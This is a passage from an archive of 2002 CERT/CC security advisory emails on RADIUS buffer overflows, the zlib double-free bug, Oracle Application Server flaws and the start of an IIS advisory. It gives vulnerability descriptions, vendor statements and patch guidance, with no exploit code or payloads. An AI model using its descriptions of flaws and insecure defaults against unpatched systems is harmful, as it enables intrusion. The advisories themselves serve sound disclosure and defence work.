contributors. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. Under this license, other parties are free to develop and release other products and versions. However, as noted in the license terns, Lucent Technologies can not and does not assume any responsibility for any releases, present or future, based on these products. Replacement Product The replacement product is NavisRadius 4.x. NavisRadius is a fully supported commercial product currently available from Lucent Technologies. Please visit the NavisRadius product web site at http://www.lucentradius.com for product information and free evaluation copies. Richard Perlman NavisRadius Product Management Network Operations Software perl@lucent.com +1 510-747-5650 Microsoft We've completed our investigation into this issue based on the information provided and have determined that no version of Microsoft IAS is susceptible to either vulnerability. NetBSD Some of the affected radius daemons are available from NetBSD pkgsrc. It is highly advisable that you update to the latest versions available from pkgsrc. Also note that pkgsrc/security/audit-packages can be used to notify you when new pkgsrc related security issues are announced. Process Software MultiNet and TCPware do not provide a RADIUS implementation. RADIUS (previously known as Lucent RADIUS) I wish to advise that Lucent Radius 2.1 is vulnerable to VU#589523, but is not vulnerable to VU#936683. I have made an unofficial patch to this code to resolve this problem. It will be released in ftp://ftp.vergenet.net/pub/radius/ where previous patches to Radius by myself are available. RADIUSClient I've just uploaded version 0.3.2 of the radiusclient library to ftp://ftp.cityline.net/pub/radiusclient/radiusclient-0.3.2.tar.gz which contains a fix for the reported buffer overflow. Red Hat We do not ship any radius software as part of any of our main operating system. However, Cistron RADIUS was part of our PowerTools add-on software CD from versions 5.2 through 7.1. Thus while not installed by default, some users of Red Hat Linux may be using Cistron RADIUSD. Errata packages that fix this problem and our advisory will be available shortly on our web site at the URL below. At the same time users of the Red Hat Network will be able to update their systems to patched versions using the up2date tool. http://www.redhat.com/support/errata/RHSA-2002-030.html SCO The Caldera NON-Linux operating systems: OpenServer, UnixWare, and Open UNIX, do not ship Radius servers or clients. SGI SGI does not ship with a RADIUS server or client, so we are not vulnerable to these issues. Wind River Systems The current RADIUS client product from Wind River Systems, WindNet RADIUS 1.1, is not susceptible to VU#936683 and VU#589523 in our internal testing. VU#936683 - WindNet RADIUS will pass the packet up to the application. The application may need to be aware of the invalid attribute length. VU#589523 - WindNet RADIUS will drop the packet overflow. Please contact Wind River support at support@windriver.com or call (800) 458-7767 with any test reports related to VU#936683 and VU#589523. XTRADIUS We are trying to relase a new and fixed version of xtradius by the end of the month (version 1.2.1).. Right now the new version is on the CVS and we are testing it... YARD RADIUS Current version 1.0.19 of Yardradius (which is derived from Lucent 2.1) seems suffering both the problems. I think I will release a new version (1.0.20) which solves those buffer overflows before your suggested date [3/4/2002]. _________________________________________________________________ Our thanks to 3APA3A <3APA3A@security.nnov.ru> and Joshua Hill and for their cooperation, reporting and analysis of this vulnerability. _________________________________________________________________ Feedback about this Advisory can be sent to the author, Jason A. Rafail. _________________________________________________________________ Appendix B. - References 1. http://www.kb.cert.org/vuls/id/589523 2. http://www.kb.cert.org/vuls/id/936683 3. http://www.security.nnov.ru/advisories/radius.asp 4. http://www.untruth.org/~josh/security/radius 5. http://www.securityfocus.com/bid/3530 ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-06.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History March 04, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPIPKVaCVPMXQI2HJAQFfUwQAq41ely7YkhdKYYM+YdjyGPpbMMqzi8Cb 7mEOX8HByLfVQL4e5wnrJOrIhRvX2jCvDMC6KCfPBR8VQ9DZz6hmj1XqUX6TH1EN T+9SnRCSxuRs8NtkBEWAYrHletfQ02C3v6As85Lqxl7nbYmXt3QrF88T+WNpv3r7 AD7ZeRPeYdI= =wtUX -----END PGP SIGNATURE----- From - Tue Mar 12 14:38:03 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g2CMVKb20332; Tue, 12 Mar 2002 14:31:21 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA21249; Tue, 12 Mar 2002 13:50:48 -0500 (EST) Date: Tue, 12 Mar 2002 13:50:48 -0500 (EST) Received: by canaveral.red.cert.org; Tue, 12 Mar 2002 13:45:21 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-07 Double Free Bug in zlib Compression Library X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 112 Status: RO X-Status: X-Keywords: X-UID: 42 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-07 Double Free Bug in zlib Compression Library Original release date: March 12, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Any software that is linked to zlib 1.1.3 or earlier may be affected * Data compression libraries derived from zlib 1.1.3 or earlier may contain a similar bug Overview There is a bug in the zlib compression library that may manifest itself as a vulnerability in programs that are linked with zlib. This may allow an attacker to conduct a denial-of-service attack, gather information, or execute arbitrary code. It is important to note that the CERT/CC has not received any reports of exploitation of this bug. Based on the information available to us at this time, it is difficult to determine whether this bug can be successfully exploited. However, given the widespread deployment of zlib, we have published this document as a proactive measure. I. Description There is a bug in the decompression algorithm used by the popular zlib compression library. If an attacker is able to pass a specially-crafted block of invalid compressed data to a program that includes zlib, the program's attempt to decompress the crafted data can cause the zlib routines to corrupt the internal data structures maintained by malloc. The bug results from a programming error that causes segments of dynamically allocated memory to be released more than once (i.e., "double-freed"). Specifically, when inftrees.c:huft_build() encounters the crafted data, it returns an unexpected Z_MEM_ERROR to inftrees.c:inflate_trees_dynamic(). When a subsequent call is made to infblock.c:inflate_blocks(), the inflate_blocks function tries to free an internal data structure a second time. Because this bug interferes with the proper allocation and deallocation of dynamic memory, it may be possible for an attacker to influence the operation of programs that include zlib. In most circumstances, this influence will be limited to denial of service or information leakage, but it is theoretically possible for an attacker to insert arbitrary code into a running program. This code would be executed with the permissions of the vulnerable program. The CERT/CC is tracking this issue as VU#368819. This reference number corresponds to CVE candidate CAN-2002-0059. II. Impact This bug may introduce vulnerabilities into any program that includes the affected library. Depending upon how and where the zlib routines are called from the given program, the resulting vulnerability may have one or more of the following impacts: denial of service, information leakage, or execution of arbitrary code. III. Solution Upgrade your version of zlib The maintainers of zlib have released version 1.1.4 to address this vulnerability. Upgrade any software that is linked to or derived from an earlier version of zlib. The latest version of zlib is available at http://www.zlib.org These are the MD5 checksums for zlib version 1.1.4: abc405d0bdd3ee22782d7aa20e440f08 zlib-1.1.4.tar.gz 9bf1d36ced334b0cf1f996f5c8171018 zlib114.zip Apply a patch from your vendor The zlib compression library is freely available and used by many vendors in a wide variety of applications. Any one of these applications may contain vulnerabilities that are introduced by this vulnerability. Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Mac OS X and Mac OS X Server do not contain this vulnerability. Compaq Computer Corporation COMPAQ COMPUTER CORPORATION ----------------------------- x-ref: SSRT0818 zlib At the time of writing this document, Compaq continues to evaluate this potential problem and impacts to Compaq released software. Compaq will implement solutions based on the conclusion of this evaluation as necessary. Compaq will provide notice of any new patches as a result any required solution through standard patch notification procedures and be available from your normal Compaq Services support channel. COMPAQ COMPUTER CORPORATION ----------------------------- Conectiva Linux Conectiva Linux supported versions (5.0, 5.1, 6.0, 7.0, ferramentas graficas and ecomerce) are affected by the zlib vulnerability. Updates will be sent to our security mailing lists and be available at our ftp site and mirrors. The updates will include a new version of zlib itself and also other packages which include their own version of zlib or are linked statically to the system-wide copy of zlib. Engarde EnGarde Secure Linux Community and Professional are both vulnerable to the zlib bugs. Guardian Digital addressed this vulnerability in ESA-20020311-008 which may be found at: http://www.linuxsecurity.com/advisories/other_advisory-1960.html EnGarde Secure Professional users may upgrade their systems using the Guardian Digital Secure Network. FreeBSD FreeBSD is not vulnerable, as the FreeBSD malloc implementation detects and complains about several programming errors including this kind of double free. Fujitsu Fujitsu's UXP/V operating system is not affected by the zlib vulnerability because it does not support zlib. Hewlett-Packard Company HP is not vulnerable. IBM Corporation IBM's AIX operating system, version 5.1, ships with open source-originated zlib that is used with the Redhat Package Manager (rpm) to install applications that are included in the AIX-Linux Affinity Toolkit. zlib (libz.a) is a shared library in AIX. AIX 5.1 is susceptible to the described vulnerability. AIX 4.3.x does not ship with zlib, but customers who install zlib and use it will be similarly vulnerable. IBM will make the patched version of zlib available as soon as it is made available to us. OpenBSD OpenBSD is not vulnerable as OpenBSD's malloc implementation detects double freeing of memory. The zlib shipped with OpenBSD has been fixed in OpenBSD-current in January 2002. Openwall GNU/*/Linux All versions of Openwall GNU/*/Linux (Owl) prior to the 2002/02/15 Owl-current snapshot are affected by the zlib double-free vulnerability. Owl-current after 2002/02/15 includes the proper fixes in its userland packages. In order to not place the users of other vendors' products at additional risk, we have agreed to delay documenting this as a security change and including the fixes in Owl 0.1-stable until there's a coordinated public announcement. While we don't normally support this kind of a policy (releasing a fix before there's an announcement), this time handling the vulnerability in this way was consistent with the state of things by the time the (already publicly known) bug was first realized to be a security vulnerability. The zlib bug could affect the following Owl packages: gnupg, openssh, rpm, texinfo (not necessarily in a security sense). Of these, the OpenSSH could potentially allow for an active remote attack resulting in a root compromise. If only SSH protocol version 1 is allowed in the OpenSSH server this is reduced to a local attack, but reverse remote attack possibilities by a malicious server remain. Additionally, any third-party software that makes use of the provided zlib library could be affected. Parts of the Linux 2.2 kernel included in Owl were also affected by the vulnerability. Fortunately, those parts (Deflate compression support for PPP and the experimental Deflate compression extension to IrDA) are normally not used by the Owl userland. The bug has been corrected starting with Linux 2.2.20-ow2 which has been made public and a part of both Owl-current and Owl 0.1-stable on 2002/03/03. This change, however, will only be documented in the publicly-available change logs on the coordinated public announcement date. Red Hat, Inc. Red Hat Linux ships with a zlib library that is vulnerable to this issue. Although most packages in Red Hat Linux use the shared zlib library we have identified a number of packages that either statically link to zlib or contain an internal version of the zlib code. Updates to zlib and these packages as well as our advisory note are available from the following URL. Users of the Red Hat Network can use the up2date tool to automatically upgrade their systems. http://www.redhat.com/support/errata/RHSA-2002-026.html Red Hat would like to thank CERT/CC for their help in coordinating this issue with other vendors. SGI SGI acknowledges the zlib vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on http://www.sgi.com/support/security/. XFree86 XFree86 versions 4.0 through 4.2.0 include zlib version 1.0.8. XFree86 3.x includes zlib version 1.0.4. The zlib code included with XFree86 is only used on some platforms. This is determined by the setting of HasZlib in the imake config files in the xc/config/cf source directory. If HasZlib is set to YES in the platform's vendor.cf file(s), then the system-provided zlib is used instead of the XFree86-provided version. XFree86 uses the system-provided zlib by default only on the following platforms: FreeBSD 2.2 and later NetBSD 1.2.2 and later OpenBSD Darwin Debian Linux The zlib code in XFree86 has been fixed in the CVS repository (trunk and the xf-4_2-branch branch) as of 14 February 2002. A source patch for XFree86 4.2.0 will be available from ftp://ftp.xfree86.org/pub/XFree86/4.2.0/fixes/. The following XFree86 4.2.0 binary distributions provided by XFree86 include and use a vulnerable version of zlib: Linux-alpha-glibc22 Linux-ix86-glibc22 When updated binaries are available, it'll be documented at http://www.xfree86.org/4.2.0/UPDATES.html. To check if an installation of XFree86 includes zlib, see if the following file exists: /usr/X11R6/lib/libz.a To check if an XFree86 X server is dynamically linked with zlib, look for a line containing 'libz' in the output of 'ldd /usr/X11R6/bin/XFree86'. Various vendors repackage and distribute XFree86, and may use settings and configurations different from those described here. zlib.org All users of zlib versions 1.1.3 or earlier should obtain the latest version, 1.1.4 or later, from http://www.zlib.org, in order to avoid this vulnerability as well as other possible vulnerabilities in versions prior to 1.1.3 when decompressing invalid data. Appendix B. - References * http://bugzilla.gnome.org/show_bug.cgi?id=70594 * http://www.kb.cert.org/vuls/id/368819 * http://www.libpng.org/pub/png/pngapps.html * http://www.redhat.com/support/errata/RHSA-2002-026.html _________________________________________________________________ The CERT/CC thanks Owen Taylor and Mark Cox of Red Hat, Inc. for reporting this vulnerability. We also thank Mark Adler of zlib.org for contributing to our research and Matthias Clasen for contributing to the discovery of this vulnerability. _________________________________________________________________ This document was written by Jeffrey P. Lanza. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-07.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History Mar 12, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPI5JsqCVPMXQI2HJAQFAvAP/f380BKQqJmAVsjL/482b86Mw8RL5k+Ov +ww1YfccKHTJdDlsqpIgX8LV59OII4KL31lAYrMrT2wJopY7wn7OSUvX7Z2aOLYE 0XQyjm5rT2mP9IKybBsHkXwHlTWZOi9iGnd9zSDndBgEaBifolcOh87z4zkE+noS OzDiRjPbg7s= =zhZM -----END PGP SIGNATURE----- From - Thu Mar 14 16:29:33 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g2F0K0b02625; Thu, 14 Mar 2002 16:20:00 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA00981; Thu, 14 Mar 2002 13:51:09 -0500 (EST) Date: Thu, 14 Mar 2002 13:51:09 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 14 Mar 2002 13:45:32 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-08 Multiple vulnerabilities in Oracle Servers X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 115 Status: RO X-Status: X-Keywords: X-UID: 43 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-08 Multiple vulnerabilities in Oracle Servers Original release date: March 14, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running Oracle8i Database * Systems running Oracle9i Database * Systems running Oracle9i Application Server Overview Multiple vulnerabilities in Oracle Application Server have recently been discovered. These vulnerabilities include buffer overflows, insecure default settings, failures to enforce access controls, and failure to validate input. The impacts of these vulnerabilities include the execution of arbitrary commands or code, denial of service, and unauthorized access to sensitive information. I. Description Oracle Application Server includes a web server based on the Apache HTTP Server. Oracle extends the web server with a number of different components that can be used provide interfaces to database applications. These components include, but are not limited to, a Procedural Language/Structured Query Language (PL/SQL) module, Java Server Pages, XSQL Servlets, and Simple Object Access Protocol (SOAP) applications. The vulnerabilities referenced in this advisory were reported in several publications by David Litchfield of NGSSoftware: * Hackproofing Oracle Application Server http://www.nextgenss.com/papers/hpoas.pdf * NGSSoftware Insight Security Research Advisory #NISR20122001 http://www.nextgenss.com/advisories/plsql.txt * NGSSoftware Insight Security Research Advisory #NISR06022002A http://www.nextgenss.com/advisories/oraplsextproc.txt * NGSSOftware Insight Security Research Advisory #NISR06022002B http://www.nextgenss.com/advisories/oraplsbos.txt * NGSSoftware Insight Security Research Advisory #NISR06022002C http://www.nextgenss.com/advisories/orajsa.txt http://www.nextgenss.com/advisories/orajsp.txt For the complete list of Oracle-related vulnerabilities published by the CERT/CC, please search the Vulnerability Notes Database using the term 'Oracle'. Details about specific vulnerabilies can be found in the appropriate vulnerability note. Oracle has addressed these vulnerabilities with patches and recommended configuration changes. For more information please see the vendor information for Oracle in Appendix A. Buffer overflows Several buffer-overflow vulnerabilities exist in the way the PL/SQL module handles HTTP requests and configuration parameters. Default configuration settings in a range of components are insecure, and different components fail to apply access restrictions uniformly. These vulnerabilities expose both the systems running Oracle Application Server and the information held in the underlying databases to undue risk. Two more buffer overflow vulnerabilities exist in code that processes configuration parameters. These parameters processes configuration parameters that can be specified via the PL/SQL gateway web administration interface. By default, access to the PL/SQL gateway web administration interface is not restricted [VU#611776]. VU#500203 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request VU#313280 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Location header VU#750299 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP request VU#878603 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Authorization header VU#659043 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via Database Access Descriptor password VU#923395 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via cache directory name Insecure default configurations The default installation of Oracle Application Server includes a number of insecure configuration settings, such as well-known default passwords and unrestricted access to applications and sensitive information. VU#307835 - Oracle9i Application Server OWA_UTIL procedures expose sensitive information VU#736923 - Oracle 9iAS SOAP components allow anonymous users to deploy applications by default VU#611776 - Oracle9i Application Server PL/SQL Gateway web administration interface uses null authentication by default VU#698467 - Oracle 9iAS default configuration allows access to "globals.jsa" file VU#476619 - Oracle 9iAS default configuration allows arbitrary users to view sensitive configuration files VU#712723 - Oracle 9iAS default configuration uses well-known default passwords VU#168795 - Oracle 9iAS allows anonymous remote users to view sensitive Apache services by default VU#278971 - Oracle 9i Application Server does not adequately handle requests for nonexistent JSP files thereby disclosing web folder path information Failure to enforce access controls Oracle Application Server does not uniformly enforce access restrictions. Different components do not adequately check authorization before granting access to protected resources. VU#180147 - Oracle 9i Database Server PL/SQL module allows remote command execution without authentication VU#193523 - Oracle 9i Application Server allows unauthenticated access to PL/SQL applications via alternate Database Access Descriptor VU#977251 - Oracle 9iAS XSQL Servlet ignores file permissions allowing arbitrary users to view sensitive configuration files VU#547459 - Oracle 9iAS creates temporary files when processing JSP requests that are world-readable Failure to validate input In one case, the PL/SQL module does not properly handle a malformed HTTP request. VU#805915 - Oracle9i Application Server Apache PL/SQL module does not properly handle HTTP Authorization header II. Impact The impacts of these vulnerabilities include the remote execution of arbitrary code, remote execution of commands and SQL queries, disclosure of sensitive information, and denial of service. Remote execution of arbitrary commands and code This section contains vulnerabilities that permit a remote intruder to cause a denial of service or execute arbitrary commands, code, or queries on the system. Some of these vulnerabilities allow execution with the privileges of the Apache process. On UNIX systems, the Apache process typically runs as the "oracle" user. On Windows systems, the Apache service typically runs as the SYSTEM user; therefore, an attacker could gain complete control of the system by exploiting these vulnerabilities. VU#500203 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request VU#313280 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via help page request Location: header VU#750299 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP request VU#878603 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via HTTP Authorization header password parameter VU#659043 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via Database Access Descriptor password VU#923395 - Oracle9i Application Server Apache PL/SQL module vulnerable to buffer overflow via cache directory name VU#180147 - Oracle 9i Database Server PL/SQL module allows remote command execution without authentication VU#736923 - Oracle 9iAS SOAP components allow anonymous users to deploy applications by default VU#712723 - Oracle 9iAS default configuration uses well-known default passwords VU#611776 - Oracle9i Application Server PL/SQL Gateway web administration interface uses null authentication by default Unauthorized access to sensitive information A number of vulnerabilities disclose configuration information or expose data stored in underlying databases. Also, insecure applications could allow an intruder to execute SQL queries. Oracle system programmers may wish to examine these vulnerabilities in Oracle's sample pages to prevent similar vulnerabilities in their own Oracle applications. VU#307835 - Oracle9i Application Server OWA_UTIL PL/SQL application exposes procedures that are remotely accessible by arbitrary users VU#193523 - Oracle 9i Application Server allows unauthenticated access to PL/SQL applications via alternate Database Access Descriptor VU#698467 - Oracle 9iAS default configuration allows access to "globals.jsa" file VU#476619 - Oracle 9iAS default configuration allows arbitrary users to view sensitive configuration files VU#977251 - Oracle 9iAS XSQL Servlet ignores file permissions allowing arbitrary users to view sensitive configuration files VU#168795 - Oracle 9iAS allows anonymous remote users to view sensitive Apache services by default VU#278971 - Oracle 9i Application Server does not adequately handle requests for nonexistent JSP files thereby disclosing web folder path information VU#547459 - Oracle 9iAS creates temporary files when processing JSP requests that are world-readable Denial of service In the case where the PL/SQL module does not properly handle an HTTP request, a denial-of-service vulnerability exists. Also, an unsuccessful attempt to exploit a buffer overflow vulnerability could crash the Apache service. VU#805915 - Oracle9i Application Server Apache PL/SQL module does not properly handle HTTP Authorization header III. Solution Oracle has provided patches and workarounds that address most of these vulnerabilities. Sites using Oracle Application Server are encouraged to install the appropriate patches and make the recommended configuration changes provided by Oracle. Solutions and workarounds for specific vulnerabilities can be found in individual vulnerability notes and in the following Oracle security alerts: * Oracle Security Alert #29 http://otn.oracle.com/deploy/security/pdf/plsextproc_alert.pdf * Oracle Security Alert #28 http://otn.oracle.com/deploy/security/pdf/ias_modplsql_alert.pdf * Oracle Security Alert #25 http://otn.oracle.com/deploy/security/pdf/modplsql.pdf * Oracle Security Alert #22 http://otn.oracle.com/deploy/security/pdf/ias_soap_alert.pdf Security and patch information for Oracle products are available at the following locations: * Oracle Security Alerts http://otn.oracle.com/deploy/security/alerts.htm * MetaLink (registration required) http://metalink.oracle.com/ Sites using Oracle Application Server may also find David Litchfield's Hackproofing Oracle Application Server paper useful in describing the impacts and various interactions of these vulnerabilities. Apply a patch Oracle has released patches that address some of these vulnerabilities. Patch information can be found in Oracle Security Alert #28 and Oracle Security Alert #25 and on the MetaLink web site (registration required). Secure default configuration Oracle has provided documentation on changing vulnerable default configuration settings. For details, consult individual Vulnerability Notes and the Oracle Security Alerts referenced in Appendix A. _________________________________________________________________ The CERT Coordination Center thanks David Litchfield and Oracle for information used in this document. _________________________________________________________________ Authors: Art Manion, Jason Rafail, and Shawn Van Ittersum _________________________________________________________________ Appendix A. - Vendor Information This appendix contains statements provided by vendors for this advisory. We will update this section as vendors provide new or modified statements, and we will note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Appendix B. - References 1. http://www.kb.cert.org/vuls/id/500203 2. http://www.kb.cert.org/vuls/id/313280 3. http://www.kb.cert.org/vuls/id/750299 4. http://www.kb.cert.org/vuls/id/878603 5. http://www.kb.cert.org/vuls/id/659043 6. http://www.kb.cert.org/vuls/id/923395 7. http://www.kb.cert.org/vuls/id/307835 8. http://www.kb.cert.org/vuls/id/736923 9. http://www.kb.cert.org/vuls/id/611776 10. http://www.kb.cert.org/vuls/id/698467 11. http://www.kb.cert.org/vuls/id/476619 12. http://www.kb.cert.org/vuls/id/712723 13. http://www.kb.cert.org/vuls/id/168795 14. http://www.kb.cert.org/vuls/id/278971 15. http://www.kb.cert.org/vuls/id/180147 16. http://www.kb.cert.org/vuls/id/193523 17. http://www.kb.cert.org/vuls/id/977251 18. http://www.kb.cert.org/vuls/id/805915 19. http://www.kb.cert.org/vuls/id/547459 20. http://www.nextgenss.com/papers/hpoas.pdf 21. http://www.nextgenss.com/advisories/plsql.txt 22. http://www.nextgenss.com/advisories/oraplsextproc.txt 23. http://www.nextgenss.com/advisories/oraplsbos.txt 24. http://www.nextgenss.com/advisories/orajsa.txt 25. http://www.nextgenss.com/advisories/orajsp.txt 26. http://otn.oracle.com/deploy/security/pdf/plsextproc_alert.pdf 27. http://otn.oracle.com/deploy/security/pdf/ias_modplsql_alert.pdf 28. http://otn.oracle.com/deploy/security/pdf/modplsql.pdf 29. http://otn.oracle.com/deploy/security/pdf/ias_soap_alert.pdf ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-08.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History March 14, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPJDsH6CVPMXQI2HJAQHgiwP+JCqCffr8d7JQejHAqJFiZGs8bnOsz4+k Fw22F6K3xaZLptM8yHo8a1KDZPEgZ9q4PkCs+VzjHxZp+xkt3eASgGctZ75xUrh0 Tt5UhitcS0R6vuH3/jKJmMqaNyszxmdcndm49SxgzUNM4JnI+h4GfjO3pTGxKyqr Ly39M389sLE= =qEP3 -----END PGP SIGNATURE----- From - Thu Apr 11 15:18:33 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g3BM71P12925; Thu, 11 Apr 2002 15:07:01 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id PAA01381; Thu, 11 Apr 2002 15:24:15 -0400 (EDT) Date: Thu, 11 Apr 2002 15:24:15 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 11 Apr 2002 15:18:47 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-09 Multiple Vulnerabilities in Microsoft IIS X-Mozilla-Status: 9001 X-Mozilla-Status2: 00000000 X-UIDL: 179 Status: RO X-Status: X-Keywords: X-UID: 44 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-09 Multiple Vulnerabilities in Microsoft IIS Original release date: April 11, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft IIS 4.0, 5.0, and 5.1 Overview A variety of vulnerabilities exist in various versions of Microsoft IIS. Some of these vulnerabilities may allow an intruder to execute arbitrary code on vulnerable systems. I. Description There are a variety of vulnerabilities in Microsoft IIS. Many of these vulnerabilities are buffer overflows that could permit an intruder to execute arbitrary code on 